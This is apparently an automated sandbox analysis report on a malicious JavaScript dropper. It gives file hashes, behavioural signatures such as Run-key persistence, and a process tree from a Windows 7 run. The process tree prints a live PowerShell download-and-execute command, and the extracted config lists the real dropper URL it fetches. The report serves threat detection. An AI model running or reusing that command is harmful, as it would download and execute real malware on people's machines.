Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    12-12-2024 02:25

General

  • Target

    65c941cb336cf645d782e99b761fb37740a615948c6c2c83a3bcba882a2c97a4.js

  • Size

    389KB

  • MD5

    a0c2859596c5ce9790594ba975cb0eac

  • SHA1

    3fcb95f0177d3ec86496f2388fb78b0b2d28820b

  • SHA256

    65c941cb336cf645d782e99b761fb37740a615948c6c2c83a3bcba882a2c97a4

  • SHA512

    738072f15990c51584c71962043e3bea38dd3b758170815f5daddfceb8622f2eff13e9c8ec1dfcc4f9c150eb8065aa9a4ac38b80e712f037ad5c325de96cfb9e

  • SSDEEP

    1536:UfffKffafffKffafffKffafffKffafffKffafffKfffffffffffffffffffffffz:XHuCM4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864899/novojeitoasync_zhpjwy.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\65c941cb336cf645d782e99b761fb37740a615948c6c2c83a3bcba882a2c97a4.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object System.Net.WebClient).DownloadString('https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864899/novojeitoasync_zhpjwy.txt'))
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
        3⤵
          PID:1612
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          3⤵
            PID:2020
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            3⤵
              PID:1256
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              3⤵
                PID:2024
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                3⤵
                  PID:1996

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\Cab418.tmp

              Filesize

              70KB

              MD5

              49aebf8cbd62d92ac215b2923fb1b9f5

              SHA1

              1723be06719828dda65ad804298d0431f6aff976

              SHA256

              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

              SHA512

              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

            • C:\Users\Admin\AppData\Local\Temp\Tar42B.tmp

              Filesize

              181KB

              MD5

              4ea6026cf93ec6338144661bf1202cd1

              SHA1

              a1dec9044f750ad887935a01430bf49322fbdcb7

              SHA256

              8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

              SHA512

              6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

            • memory/2712-7-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

              Filesize

              9.6MB

            • memory/2712-4-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

              Filesize

              4KB

            • memory/2712-8-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

              Filesize

              9.6MB

            • memory/2712-9-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

              Filesize

              9.6MB

            • memory/2712-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

              Filesize

              9.6MB

            • memory/2712-11-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

              Filesize

              9.6MB

            • memory/2712-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

              Filesize

              32KB

            • memory/2712-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

              Filesize

              2.9MB

            • memory/2712-48-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

              Filesize

              9.6MB

            • memory/2712-49-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

              Filesize

              4KB

            • memory/2712-51-0x0000000002CD0000-0x0000000002D16000-memory.dmp

              Filesize

              280KB

            • memory/2712-52-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

              Filesize

              9.6MB